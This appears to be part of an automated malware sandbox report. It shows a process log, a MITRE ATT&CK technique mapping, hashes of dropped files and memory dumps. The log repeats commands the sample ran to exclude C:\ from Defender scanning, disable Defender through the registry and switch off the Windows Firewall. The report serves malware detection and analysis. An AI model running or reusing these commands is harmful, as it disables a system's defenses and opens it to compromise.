C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5368

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:6436

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:6768

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:6292

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:6272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5632

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:4468

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:6488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1436

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:6868

C:\Windows\SYSTEM32\NetSh.exe
"NetSh.exe" Advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:1752

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5975.tmp.csv
Filesize
46KB

MD5
5f58515504e94d82668ae8d746c379af

SHA1
ec09c396b7e65b0b2c8257f709b91c320104f4ce

SHA256
f9aba1fa24246e41f41af2b271f1e83c52c75a1ecd119f6f8ebff92740cb3258

SHA512
c7ae95a3ad6ce53c15968c4a2dd8859d97c38142804f18c8e08b71f34306a904ac9f9d325699e175657a01f2d02057e6d2f9c2819b6bc1928cd22771ff029622

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5ABE.tmp.txt
Filesize
13KB

MD5
1d0f270ede423ec0f77ee5b34fb3ba48

SHA1
b8d7cfc466174b14742221d6e082ab51604df90f

SHA256
69e25d20031ea95021da64e3b6e3ae864f0f20398f0d6181a96d97b23fcebfda

SHA512
9859665f37fbd6ba45fe1ae529ee751339fe25f5404c6253d6027a4fec818dcd38109508c9dc05f5c185bc4aee037565337984925c0290b9ee9ff906d1096602

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d0a40a2d16d62c60994d5bb5624a589b

SHA1
30f0a77f10518a09d83e6185d6c4cde23e4de8af

SHA256
c213a4024e89a0240d0b1fa3b18ea3db3db7bbe7ca1bdeed86dce9c2c4991ef8

SHA512
cecef5087f194a83948880e36445324406218f6877386d6db7850b8f97ac107e042ea9445bb7e73c6e6a2c7da9782b7dae8caba0a1c997677d096b3271a4cac0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9bc110200117a3752313ca2acaf8a9e1

SHA1
fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

SHA256
c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

SHA512
1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
405185bc0ea52b588b936aee6b9bbe3f

SHA1
485209c45e9f4ecfbb07096e5cacc1a359d577c6

SHA256
35cf92b2f431bc23642c047e98da70737e01d924d7c69df6a6ecca82cb7ad40a

SHA512
ac235e45fcf5e0b220c25e249366adf7b306fd3337d2eb1367a7168a6d45c0b434a3dc06f80c133e0119e65fc267bc274a9900ad86485b72c9126174ebd7d74e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
ffede50dfbdc1ca783956b54f0bd0fbe

SHA1
a1cd8fc95addb2a3612e28ed222eb9adee48de97

SHA256
2e55075aedae2b4dabcb3fafe59680d861b39e6fee6f9c09e5782008dca0a52b

SHA512
6d19c889a02eedcf8d8733cab4710cc2892a96f846eb2886997737c6dc87f56a60745d82b941eb0a74d0f82ac16c46366e5ae42bb6879de962e01caa5cf3cb5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2120318c29ff77f36fb6f88c2e474bf7

SHA1
f9902abbcd3fe42b7d53a1a143c842b49633ecd3

SHA256
32f71a9ecf7db8f72de8e8ef322330119ad83c4e87e7c2d98ccdddb15741930e

SHA512
aa1794e54279cd3f68b5f70f6f3c6e14cdc78af154e11140dff634ae6066fbf554a65a0c8a836d9403fedac70658cdf64a523ae99358c0c770e7424a21b1dd47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
800ad61add6ba6aa63630bb495f0f727

SHA1
68dab299f2c6394c13b72d9df240e6b89c48963c

SHA256
2188ad28533e0a5846b0db6c327a4bc24ec94fca139e83d34d9be85c79c5ea75

SHA512
e011e77f4169656a131420224f4b6fb5f6a65759ceaa2bd89522868bed406c551b6a6d17707686efc98fc1039063249261f062d87c499d856fc0cf488e1891cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6e227341ec00a542edb219509f41c19d

SHA1
7267a14ff04069fedcd21ac8f65ca2eebfe7048d

SHA256
d01eba88959abc64083ce6946a76fd692a30f461547d66e13d1a86776222a8ca

SHA512
3c975186a38eb286da9caee0278c1904a6f75874e148f4689c42fde5bd7b341926732b5941862140fb5adcd650da256532c3f34cace07c614a82c4ffecfbc2e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
87a373a0388b9b4ff9517bf060b52c9b

SHA1
4d7a2df1185faaa1e18b09b318eb8d64937ba7f9

SHA256
d8d81a351307b1089bd337ceb14c9a183a62f630d528db198f99228053e1d2c0

SHA512
ff588464e2ab28a3a1a20b2c05e242cc5e4bf1ceac64fc551da91b0bc6b4f01ef86a8508def7f81b124767703e1f4501247a1df8107a690989c4cc266b81eb6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
13e5260e039b147eeccccd0e4e68df21

SHA1
882c8bfc8205ce8d216f82e3346bd4f494a87219

SHA256
053467d5fec0ae72ff57512e1ce5289843f999da4e6cc55fcf883637961688fd

SHA512
9f22f62a6c64c848c0ec588eb685b9bf26c9ca67c72870d56a7e38fa016b532ad3578347d2f5ba63addff547709db739fd2d1994b8c82e19575061d64d4c1c9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
358897459512b9d5c2be170ec908d608

SHA1
e148b7f56ef6acfb1559371f67c68ce9b8ab6078

SHA256
1905dc1d997787318b7e03374d0153fa77c08cf76167758d539b00c48e417d3e

SHA512
6edc8ecac30aa74f0eedbc33722878e0b8154e63f6c8f7cadca1b08c039535dc0fb64b046ba4631f269704d9bf7202fa1afb0f858aa5ae508387427b6f71627a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
17fbfbe3f04595e251287a6bfcdc35de

SHA1
b576aabfd5e6d5799d487011506ed1ae70688987

SHA256
2e61ae727ca01496c9418a65777d6d7e05a85cbdb6b3a19516857442e5bd2da0

SHA512
449c68512d90a17f598e9dacfd6230e6e97bc6bfaaf2b06f3b91b370ece92e2322b81ee3721e288880fa1f05470156e519256e3f03d786c3b28a39788f5e0ad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9611cc3fb39fedd4b0e81d90b044531c

SHA1
e35c10c1c1e29d44222114e0f72d58b3072880fd

SHA256
2090eae25be03e07ff54e5ab9d219902fb80e8c1f6fe52e73c9a4afcf5eec5ec

SHA512
92cf8fdd0353dd1e04856b6642483ac426ea32113a0b7436cf8224623912ae2f31078c7e70cef1c67f859504bd29e05f9af69f06533725e57244063e89e4954d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
c2ce5f364d6f19da44a34ce23f13e28b

SHA1
a7fc544cc9e62c759c0b0aeaecf324d7196a127e

SHA256
443840750cfcd34c23063c9d38b9755b6dbc690ac63f32bb220ab61d19766dbb

SHA512
fc9dbbdfc8d951c4b1cf9bc68a02340f6929c1796c8318f5b740892beb25a80af4201b18f5bf27ecb512bf9a840fd0e81b868b4c1ae2e9d85992dfc12c1cb1e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
9d242ecbd14a1eb3eb92ca2e6d3251e8

SHA1
7c97437c235aba11c24f4185d9ef500959aa9966

SHA256
bb019b9d6677a5cb0e3ebdca383ae1962fe454b4eac4cd045558498e732818d1

SHA512
d287d761f0b85b437bbd4bf279ac3eb7bb2bd92f0412ce55f4b2d26d6a3000af10b77e0154b33401845cf75b36f3ef452a345416800055ff890a6c139a66e977

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2f154a03d8e551f9504a1518466e078b

SHA1
0e86b7b383076172274015e3b0b5c63cccc1dfcf

SHA256
9e4b3b8ae2ff2beb2a1849ef05455c6e0542e9227267decbcd1b96a48f7227be

SHA512
7f1fba4d131b3ec4f1bbe204e29516bcd2ea111afe4b03da2f5eaf25b3bfbea08808192005020eb7d706a9e971fdd8ebe068f883f72c6759926ef58ae9db47e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
205f6010c033eefc37d63d8ce846bce4

SHA1
417b1aabb447765a2aa149529a1f4f52ded194ea

SHA256
993dbee9fb487dbdff56c09a1df360ea68b583bd8b28b2c315ec9d92639f3697

SHA512
c6bbd60c82ffbc3297d1d355ab3c6692de97da0b3bdd60ea4aacec6d27d360341cefa11a4411d7b8877d54d1177b48f4dc003e2a391031cc1a304b177689bfaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxvni20i.w4k.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp5A21.tmp.png
Filesize
4.2MB

MD5
eb11084fa40de7a35a48883ebcc5115b

SHA1
93e11ceb06781f99e6594c306a92f2e716a8140d

SHA256
01294130ecd5ed9163c59a532847da057c5df224942960a031ce0b38d7d3d46c

SHA512
eb4acfa776ce99ca721a33ebb3267fdb7d7b929363b72107c4e5b74d25218808e3ed8896ccf2974071262eae9ed23e8a86bc5ca176613e0158fc7b852b0ba24e

Download Submit
memory/216-63-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/216-60-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/216-64-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/1096-94-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/1096-92-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1096-93-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/1860-29-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/1860-28-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1860-30-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/2204-77-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/2204-79-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/2204-78-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4004-52-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/4004-50-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4004-51-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4224-14-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4224-41-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4224-0-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

Filesize
8KB

Download
memory/4224-104-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4224-16-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/4224-1-0x000001D2FB6D0000-0x000001D2FB6E8000-memory.dmp

Filesize
96KB

Download
memory/4224-74-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4224-7-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/4224-4-0x000001D2FE650000-0x000001D2FEB78000-memory.dmp

Filesize
5.2MB

Download
memory/4224-6-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4224-3-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/4224-2-0x000001D2FDF50000-0x000001D2FE112000-memory.dmp

Filesize
1.8MB

Download
memory/4224-47-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/4224-5-0x000001D2FBB50000-0x000001D2FBB8E000-memory.dmp

Filesize
248KB

Download
memory/4700-112-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4700-118-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/4700-117-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/5376-19-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5376-18-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5376-20-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/5376-25-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5376-21-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/5412-11-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/5412-8-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5412-12-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/5412-13-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5412-9-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5412-10-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5448-24-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/5448-15-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

Filesize
8KB

Download
memory/5448-683-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/5448-26-0x000001E475DD0000-0x000001E475DE0000-memory.dmp

Filesize
64KB

Download
memory/5448-31-0x000001E475DE0000-0x000001E475E02000-memory.dmp

Filesize
136KB

Download
memory/5496-45-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/5496-44-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5496-46-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/5848-62-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/5848-59-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/5848-61-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download